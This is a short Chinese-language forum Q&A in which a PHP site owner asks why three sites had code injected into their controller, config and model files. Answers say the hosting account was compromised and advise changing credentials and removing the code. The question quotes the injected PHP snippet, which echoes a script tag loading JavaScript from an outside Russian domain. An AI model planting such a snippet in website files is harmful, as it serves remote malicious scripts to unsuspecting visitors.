如何解决PHP网站中的代码注入问题


How to solve code injection in PHP websites?

我有三个PHP网站。其中两个在同一个主机上,一个在另一个主机上,这三个网站同时在控制器,配置和模型文件中注入代码,就像这样

#266a81#
if(empty($nwu)) {
$nwu = "<script type='"text/javascript'" src='"http://allinclusivetravel.ru/w96rnjzc.php?id=1709100'"></script>";
echo $nwu;
}

我想知道原因和解决办法。

如果他们直接将代码注入到您的源文件中,则您的主机帐户或服务器已受到威胁。更改了您的所有凭据,SSH密钥等,并立即与您的主机联系。

你必须手动删除他们注入的所有代码。

也许我没有理解,你要删除标签吗?如果是这样,您可以尝试这样做:从HTML内容中删除脚本标签